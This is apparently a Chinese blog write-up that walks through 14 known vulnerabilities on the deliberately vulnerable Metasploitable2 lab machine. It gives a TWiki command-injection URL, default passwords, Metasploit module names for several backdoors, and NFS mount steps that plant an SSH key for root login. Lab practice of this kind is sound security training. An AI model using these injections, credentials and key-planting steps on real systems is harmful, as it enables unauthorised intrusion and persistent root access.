【漏洞验证】Metasploitable2靶机漏洞复现

文章目录

  • Metasploitable2靶机漏洞复现
    • 1、TWiki 'rev' Parameter Arbitrary Command Execution
    • 2、VNC Server 'password' Password
    • 3、Ingreslock 后门漏洞
    • 4、UnrealIRCd Backdoor(ircd)
    • 5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution
    • 6、Tomcat管理台默认口令漏洞
    • 7、MySQL弱密码登录
    • 8、PostgreSQL弱密码登录
    • 9、Distcc后门漏洞
    • 10、vsftpd 2.3.4 后门漏洞
    • 11、Druby 远程代码执行漏洞
    • 12、Samba sysmlink 默认配置目录遍历漏洞
    • 13、Samba MS-RPC Shell 命令注入漏洞
    • 14、Linux NFS共享目录配置漏洞

Metasploitable2靶机漏洞复现

参考大佬:
https://blog.csdn.net/Fly_hps/article/details/89763310
https://blog.csdn.net/fly_hps/article/details/89763364

环境:vmware虚拟机Metasploitable2环境
IP:192.168.72.130

1、TWiki ‘rev’ Parameter Arbitrary Command Execution

描述: rev参数可执行任意命令
验证: http://192.168.72.130/twiki/bin/view/Main/TWikiUsers?rev=2%20|pwd||echo
【漏洞验证】Metasploitable2靶机漏洞复现_第1张图片

2、VNC Server ‘password’ Password

验证: vncviewer 192.168.72.130
Password: password【漏洞验证】Metasploitable2靶机漏洞复现_第2张图片

3、Ingreslock 后门漏洞

原理: Ingreslock后门程序监听1524端口,连接到1524端口就可以直接获取root权限。
端口: 1524
验证: telnet 192.168.72.130 1524
在这里插入图片描述

4、UnrealIRCd Backdoor(ircd)

端口: 6667
利用模块: exploit/unix/irc/unreal_ircd_3281_backdoor
【漏洞验证】Metasploitable2靶机漏洞复现_第3张图片

5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution

CVE-2012-1823
利用模块: exploit/multi/http/php_cgi_arg_injection
【漏洞验证】Metasploitable2靶机漏洞复现_第4张图片

6、Tomcat管理台默认口令漏洞

192.168.160.131:8180
tomcat/tomcat

7、MySQL弱密码登录

验证: mysql –h 192.168.160.131 –u root
【漏洞验证】Metasploitable2靶机漏洞复现_第5张图片

8、PostgreSQL弱密码登录

postgres/postgres
【漏洞验证】Metasploitable2靶机漏洞复现_第6张图片

9、Distcc后门漏洞

CVE-2004-2687

nmap扫描:
在这里插入图片描述
端口: 3632
利用模块: exploit/unix/misc/distcc_exec
【漏洞验证】Metasploitable2靶机漏洞复现_第7张图片

10、vsftpd 2.3.4 后门漏洞

nmap扫描:
在这里插入图片描述
利用模块: exploit/unix/ftp/vsftpd_234_backdoor
【漏洞验证】Metasploitable2靶机漏洞复现_第8张图片

11、Druby 远程代码执行漏洞

CVE-2013-0156(类似)

利用模块: exploit/linux/misc/drb_remote_codeexec
端口: 8787
【漏洞验证】Metasploitable2靶机漏洞复现_第9张图片

12、Samba sysmlink 默认配置目录遍历漏洞

CVE-2010-0926

端口: 445
利用模块:
auxiliary/admin/smb/samba_symlink_traversal
set SMBSHARE tmp //设置SAM可写文件

在新窗口下打开上面生成的共享目录:

smbclient //IP/tmp (不输入密码直接回车)
cd rootfs
ls

【漏洞验证】Metasploitable2靶机漏洞复现_第10张图片

13、Samba MS-RPC Shell 命令注入漏洞

CVE-2007-2447

端口: 139
利用模块: exploit/multi/samba/usermap_script
【漏洞验证】Metasploitable2靶机漏洞复现_第11张图片

14、Linux NFS共享目录配置漏洞

原理: NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录
【漏洞验证】Metasploitable2靶机漏洞复现_第12张图片
在这里插入图片描述
输入ssh-keygen 生成RSA公钥
【漏洞验证】Metasploitable2靶机漏洞复现_第13张图片
依次输入:
(1)mount –t nfs 192.168.160.131:/ /tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;
(2)cat/root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;
(3)[email protected],实现无密码登录
【漏洞验证】Metasploitable2靶机漏洞复现_第14张图片

你可能感兴趣的:(测试)